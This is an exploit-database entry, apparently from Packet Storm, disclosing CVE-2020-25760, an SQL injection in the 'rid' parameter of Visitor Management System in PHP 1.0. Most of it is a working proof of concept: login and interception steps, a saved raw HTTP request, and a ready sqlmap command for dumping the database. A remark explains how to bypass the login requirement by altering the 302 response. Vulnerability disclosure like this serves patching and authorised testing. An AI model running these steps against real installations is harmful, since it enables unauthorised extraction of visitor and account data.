Share
## https://sploitus.com/exploit?id=PACKETSTORM:159262
# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection  
# Exploit Author: Rahul Ramkumar  
# Date: 2020-09-16  
# Vendor Homepage: https://projectworlds.in  
# Software Link:  
https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip  
# Version: 1.0  
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1  
# CVE: CVE-2020-25760  
# Description  
The file front.php does not perform input validation on the 'rid'  
parameter. An attacker can append SQL queries to the input to extract  
sensitive information from the database.  
Note: This exploit can work pre-authentication as well, but need to change  
the 302 Response to 200 using an intercept tool. It should be pretty  
straight forward so I have not shown how.  
  
#POC  
  
1) Navigate to the login page  
  
Example:  
  
http://192.168.1.72/visitor_management/index.php  
  
2) Enter 'username' and 'password'  
  
3) On the homepage, click on any visitor name and intercept the request  
  
4) Save the request to file. Example, visitor_management_sqli.req  
  
GET /visitor_management/front.php?rid=373568 HTTP/1.1  
Host: 192.168.1.72  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101  
Firefox/78.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://192.168.1.72/visitor_management/front.php  
Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef  
Upgrade-Insecure-Requests: 1  
  
5) Run SQLmap on the file,  
  
sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10